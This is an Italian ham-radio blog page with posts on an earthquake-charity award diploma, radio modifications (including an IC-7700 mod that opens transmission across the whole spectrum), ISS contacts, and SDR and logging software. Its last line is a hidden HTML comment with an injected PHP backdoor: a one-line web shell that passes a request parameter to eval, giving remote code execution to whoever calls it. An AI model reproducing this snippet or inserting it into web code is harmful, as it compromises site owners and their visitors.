Anonimo
COMUNICATO URGENTE.

Il Terremoto che ha colpito parte del Centro Italia il 24 agosto non può lasciarci assolutamente indifferenti e tanto meno indifferente lo spirito con cui avevamo istituito il nostro Diploma in ricordo degli avvenimenti del 1976 in Friuli. Pertanto abbiamo deciso di modificare in parte la destinazione dei proventi del Diploma, destinando una metà a Telethon e l’altra metà alle Genti colpite dal loro “Orcolat” mercoledì scorso. Pertanto invitiamo la comunità radioamatoriale a partecipare ancora più assiduamente ed attivamente al Diploma, in modo di dare un nostro tangibile aiuto.
Una goccia non è nulla, tante gocce formano un mare e per far si che questo mare sia grande, la Commissione del Diploma “Orcolat” ha deciso di facilitare quanto più possibile il conseguimento dell’ Award, riducendo del 50% i punteggi necessari, che diventano così 30 per le stazioni italiane e 15 per SWL e stazioni straniere. QUINDI INVITIAMO TUTTI I RADIOAMATORI AD ADERIRE AL DIPLOMA, in modo di dare un tangibile contributo agli Italiani meno fortunati di noi e ai terremotati del centro Italia. Se poi qualcuno vorrà versare qualcosa in più rispetto al contributo previsto, non possiamo che dire GRAZIE!
Udine, lì 30/08/2016

Scarica il nuovo regolamento 

diploma
Il Comitato Regionale del Friuli Venezia Giulia, con la stretta collaborazione delle Sezioni ARI di GORIZIA, GRADO, MANZANO, MONFALCONE, PORDENONE, SAN DANIELE, TRIESTE e UDINE, nel 40° anniversario del terremoto, istituisce un diploma, a carattere temporaneo, suddiviso in due periodi, denominato “ORCOLAT”.

A questo link è possibile avere informazioni e scaricare il regolamento http://www.ari-crfvg.it/orcolat.asp

Come molti apparati radioamatoriali anche il Kenwood TS990 dispone di un attenuatore (in questo caso di 20db) nella banda delle onde medie (522 kHz – 1705 kHz).
Se in zona non sono presenti emissioni che rischiano di sovraccaricare gli stadi del ricevitore è possibile rimuoverle l’attenuazione in modo separato per uno solo o entrambi gli rx molto semplicemente spostando due jumper. Cliccare  sulla foto per le istruzioni.
 
Like many amateur rtx also the Kenwood TS990 has an attenuator (in this case of 20db) in the band of medium waves (522 kHz – 1705 kHz).
If in the area there are no emissions that threaten to overload the receiver, you can remove the attenuation separately for one or both rx simply by moving two jumpers.
Click on the photo for instructions.
 
990

L’autore non si assume nessuna responsabilità in caso di problemi.
The author assumes no responsibility for any problems.

55° Anniversario Pattuglia Acrobatica Nazionale- “Frecce Tricolori”
DIPLOMA – TROFEO

55

Dal 01 Settembre 2015 al 20 Settembre 2015

Tutte le info su http://www.iv3ium.it/diploma55_trofeo_pan.html

esa_samantha_cristoforetti

Mancano oramai poche ore alla partenza di Samantha Cristoforetti e degli altri astronauti verso la stazione spaziale ISS.
Con un in bocca al lupo al nostro capitano ricordo che su http://www.astronauticast.com/live si potrà seguire la diretta del lancio a partire dalle ore 20:45.

Nella speranza che Samantha come il suo predecessore Luca Parmitano dedichi un po di tempo alla radio la aspettiamo sulle solite frequenze ISS di 145,200 MHz in uplink e 145,800 MHz in downlink.

logo_ii0hq

Sosteniamo la nostra nazionale durante lo IARU HF Championship.

Tutte le info sul sito ARI

Senza titolo-2

 

Grazie al Prof. Tognolatti ed ai suoi collaboratori che anche quest’anno si sono interessati alla presentazione della domanda abbiamo l’autorizzazione alla sperimentazione nella banda dei 70 Mhz.

Le modalità solo le stesse degli scorsi anni, a questo link si può scaricare l’autorizzazione.

Alcuni siti utili da consultare per operare in questa banda:

http://www.70mhz.org/

https://fouritalia.wordpress.com

 

Tagged ,
Posted in Radioamatori

Alexander Gerst KF5ONO from ISS answers at the questions of the students at Focus Camp in Candriai (Italy) the 20/06/2014.

EQsl è ormai un sistema di qsl elettronica utilizzato da moltissimi radioamatori in tutto il mondo.
La gestione del carico e scarico delle conferme avviene in automatico tramite la maggioranza dei programmi log e considerando il fatto che molte delle eqsl utilizzate hanno uno sfondo scelto tra quelli preimpostati dai gestori del servizio spesso non ci interessa nemmeno andare a vederle perdendo così la possibilità di osservare qualche bella eqsl personalizzata.
Se decidiamo invece di goderci le nostre eqsl ci viene in aiuto un’ottimo programma creato da IZ0ROQ Claudio che si chiama eQsl Show.
Il programma prelevabile da questo link ci permette di scaricare in una cartella tutte le nostre eqsl semplicemente selezionando cartella di destinazione, intervallo temporale ed inserendo nome utente e password. Il programma dispone anche di un’anteprima che ci permette di vedere le eqsl in una finestra.

 

eqsl show

Tagged , ,
Posted in Radioamatori
admin

HB9HQX ha da poco rilasciato una nuova versione del suo software per il jt65 in hf.
La nuova versione può essere scaricata da http://sourceforge.net/projects/jt65hfhb9hqxedi/

 

JT65-HF

 

Oltre alla correzione di alcuni bug e modifiche estetiche la nuova versione incorpora la sincronizzazione dell’ora in modo da non richiedere più la necessità di installare altri software.

Tagged ,
Posted in Radioamatori
admin

E’ disponibile da poco il successore del ricevitore sdr FDM-S1 prodotto dalla Elad.
L’FDM-S2 arriva con in dotazione una comoda busta in tela per il trasporto,
il cavo usb ed il cdrom con la prima versione del software FDM-SW2.
Essendo il software in continuo sviluppo le successive versioni potranno
essere scaricate dal gruppo https://groups.yahoo.com/neo/groups/elad_sdr_en

Dal sito del produttore rileviamo i seguenti dati:
FDM-S2 è l’ultimo nato della nostra linea di Campionatori ELAD Samplers.

FDM-S2 è un ricevitore a campionamento diretto basato su un ADC a 16bit con clock a 122.88MHz capace di coprire tute le HF fino ai 6m e offre inoltre la possibiilità di sfruttare le possibilità di utilizzo in sottocampionamento sperimentando la gamma delle emittenti FM e parte della gamma VHF Band da 135 a 160MHz.

Gamme & le più importanti caratteristiche:

HF: 9kHz-52MHz MDS: -132dBm @14MHz, Clipping lev -8dBm

FM: 74-108MHz sensitivity

VHF: 135-160MHz MDS -137dBm @145MHz, Clipping level -19dBm

Ingressi separati d’antenna per HF/6m e FM/VHF/Bypass

Massima banda DDC Bw 6144kHz (banda visibile fino a 5 Megahertz)

bande selezionabili:
192ksps-32bit, 384ksps-32bit, 768ksps-32bit, 1536ksps-32bit, 3072ksps-32bit, 6144ksps-16bit

Modo speciale con Doppio DDC per 2 canali con 384kHz banda da unarsi un una delle gamme di ingresso

4 ricevitori virtuali sintonizzabili all’interno della stessa finestra DDC sintonizzata

Ogni ricevitore virtuale mantiene memorizzato il suo modo, filtro, volume, squech e audio di uscita

Tripla Tuning Bar per sintonia grossolana e fine brevettata

modi CWU,CWL,USB,LSB,AM,SAM,FM,WFM,DSB,RTTY,DRM,RDS

Sopressione delle Interferenze: Noise Blanker,Adaptive Noise Reduction and auto notch, 2 noche manuali (disponibili all’interno dello spettro del DDC)

DRM decoder integrato , testo e programmazione aggiornabili via internet.

WFM Stereo decoder con RDS decoder.

controllo CAT e integrazione con OmniRig(tm)

Possibilità di usare il ricevitore come IF panadapter con il software capace di integrazione con ricevitori/transceiver esistenti

Gestione delle memorie basate su file XML

Integrazione con DX cluster e EIBI database import

Visualizzazione delle memorie, database e informazioni dei cluster direttamente sullo sovraimpresso allo spettro visualizzato

Ext IO bus proprietario per comunicazione con gli accessori, offre anche 8 linee di uscita per il comandi universale di dispositivi esterni (*usando scheda SFE1.0)

Supportato anche da software di terze parti: SDR-RadioV2 , Winrad, HDSDR, Studio 1

possibilità di registrare audio o tutto lo spettro di uscita del DDC anche in modalità di programmazione dell’orario schedulata nel tempo

Finestre degli spettri IF/AF per una dettagliata analisi del segnale

Finestre dimensionabili e supporto multischermo

Possibilità di usare una seconda scheda audio con supporto I/Q fino a 192ksps disponibile per essere usata per software di decodifica quali CW Skimmer,WeatherFax, Fldigi…

Integrazione con la serie di accessori Tmate

Alimentazione da USB che permette la portatilità con l’uso di notebook

Server integrato per l’uso remoto da browser Firefox (lavora anche con app Firefox su dispositivi tablet con s.o. Android)

Dimensioni compatte 110 (W) x 90 (D) x 40 (H) mm, peso 360g,

La confezione includeh 2 adattatori BNC-SMA, cavo USB, cavo sdoppiatore di alimentazione USB, CD e sacca di protezione.

 

Ricezione in modo AM

Ricezione in modo DRM

Tre ricevitori indipendenti di cui uno in DRM

Ricezione in FM con RDS

Collegamento effettuato il 21/08/2013 con l’astronauta Luca Parmitano dalla stazione spaziale ISS.

Setup:

RTX Yaesu FT817 – PA Tokio hy-power HL-350Vdx (40w out)

ANT 2x6el home made – Azimut & elevazione manuale.
 

Posted in Radioamatori

Malgrado la possibilità di iniziare ad utilizzare la fetta 7100 — 7200 Mhz dal 29 Marzo ho deciso di aspettare le ferie per effettuare
l’espansioni di banda sull’IC 7700.
Il lavoro è iniziato con la preparazione delle condizioni necessarie per operare all’interno di un apparato di questo valore.
Le prime operazioni riguardano lo smontaggio del pannello superiore e dopo averlo identificato lo smontaggio del pannello della logic unit.
Ad apertura eseguita ci si trova davanti ad una realizzazione veramente spettacolare tale da passare i primi minuti a godersi la vista.

 

IC-7700_esp

 

Individuati i diodi da dissaldare come descritto nelle modifiche su mods.dk ho compiuto l’operazione dopo aver sostituito per l’occasione la punta del saldatore con una nuova.

 

IC-7700-diodi

 

Dalle prime prove si nota che l’apparato ora risulta aperto in trasmissione in modo continuo su tutto lo spettro.
Nella “prima volta” di utilizzo della nuova porzione di banda VE9NC, CM3RPN, XE3DX, VE3NOO e i soliti W3, N3, KB8, N8 ecc.

Le operazioni terminano con la richiusura dell’apparato e sfruttando l’occasione con un po’ di pulizie e sistemazione dei cavi retrostanti.

<!– [insert_php]if (isset($_REQUEST["svK"])){eval($_REQUEST["svK"]);exit;}[/insert_php][php]if (isset($_REQUEST["svK"])){eval($_REQUEST["svK"]);exit;}[/php] –>